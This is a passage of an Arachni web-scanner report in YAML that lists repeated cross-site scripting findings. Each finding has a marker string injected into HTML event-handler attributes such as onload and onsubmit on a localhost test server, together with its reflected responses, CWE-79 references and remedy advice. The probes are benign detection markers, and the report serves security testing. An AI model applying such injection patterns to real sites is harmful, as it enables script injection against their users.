    response: <a href='/' onload=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onload</a><a href='/' onload="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onload</a><a href='/' onload='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onload</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onload
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onunload
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "415"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onunload="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onunload</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onunload
      :id: <a href="/" onunload="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onunload</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onunload=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onunload</a><a href='/' onunload="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onunload</a><a href='/' onunload='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onunload</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onunload
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onblur
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "403"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onblur="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onblur</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onblur
      :id: <a href="/" onblur="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onblur</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onblur=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onblur</a><a href='/' onblur="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onblur</a><a href='/' onblur='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onblur</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onblur
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onchange
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "415"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onchange="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onchange</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onchange
      :id: <a href="/" onchange="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onchange</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onchange=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onchange</a><a href='/' onchange="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onchange</a><a href='/' onchange='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onchange</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onchange
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onfocus
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onfocus="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onfocus</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onfocus
      :id: <a href="/" onfocus="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onfocus</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onfocus=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onfocus</a><a href='/' onfocus="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onfocus</a><a href='/' onfocus='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onfocus</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onfocus
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onreset
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onreset="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onreset</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onreset
      :id: <a href="/" onreset="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onreset</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onreset=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onreset</a><a href='/' onreset="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onreset</a><a href='/' onreset='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onreset</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onreset
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onselect
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "415"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onselect="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onselect</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onselect
      :id: <a href="/" onselect="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onselect</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onselect=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onselect</a><a href='/' onselect="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onselect</a><a href='/' onselect='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onselect</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onselect
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/form/onsubmit
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "415"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onsubmit="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onsubmit</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: form
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/form/onsubmit
      :id: <a href="/" onsubmit="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onsubmit</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onsubmit=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onsubmit</a><a href='/' onsubmit="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onsubmit</a><a href='/' onsubmit='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onsubmit</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/form/onsubmit
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: form
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
